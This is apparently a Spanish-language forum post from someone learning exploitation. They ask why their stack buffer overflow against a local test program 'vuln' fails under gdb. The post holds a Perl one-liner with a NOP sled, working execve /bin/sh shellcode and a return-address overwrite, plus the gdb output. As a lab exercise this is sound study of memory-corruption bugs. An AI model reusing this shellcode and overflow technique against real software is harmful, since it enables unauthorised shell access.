una duda... en un tuto de Garfield07, al usar gdb y poner un break en una funcion al usar este comando le aparece el RET
Código:
Breakpoint 1, vuln (buff=0xbffffb5f "AAA") at vuln.c:8
8 strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff904: 0x00000000
pero yo al hacerlo me aparece diferente
Citar
(gdb) r $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "XXXX"')Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "XXXX"')
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) br vuln
Breakpoint 1 at 0x804845a: file vuln.c, line 8.
(gdb) r AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln AAA
Breakpoint 1, vuln (buff=0xbffff604 "AAA") at vuln.c:8
8 strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff37c: 0xb7fbfff4
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) br vuln
Breakpoint 1 at 0x804845a: file vuln.c, line 8.
(gdb) r AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln AAA
Breakpoint 1, vuln (buff=0xbffff604 "AAA") at vuln.c:8
8 strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff37c: 0xb7fbfff4
y al continuar con la execucion para visualizar la shell me aparece esto
Código:
(gdb) r $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x7c\xf3\xff\xbf"')
Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x7c\xf3\xff\xbf"')
Breakpoint 1, vuln (
buff=0xbffff5d3 "\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\061\300Ph//shh/bin\211\343P\211\342S\211\341\260\v̀|\363\377\277") at vuln.c:8
8 strcpy (buffer, buff);
(gdb) c
Continuing.
Program received signal SIGILL, Illegal instruction.
0xbffff37e in ?? ()
al principio me llamo la atencion "Illegal instruccion" asi que use x/x buff y me salio
Código:
0xbffff604: 0x00414141
asi que a los NOP le aumente a "r AAAA" y me aparce
Código:
0xbffff603: 0x41414141
no se si eso tenga algo que ver, igual el ret me aparece igual
alguien sabe que podria salir mal o que otra manera podria encontrar RET?
como informacion adicional uso debian con gcc-4.6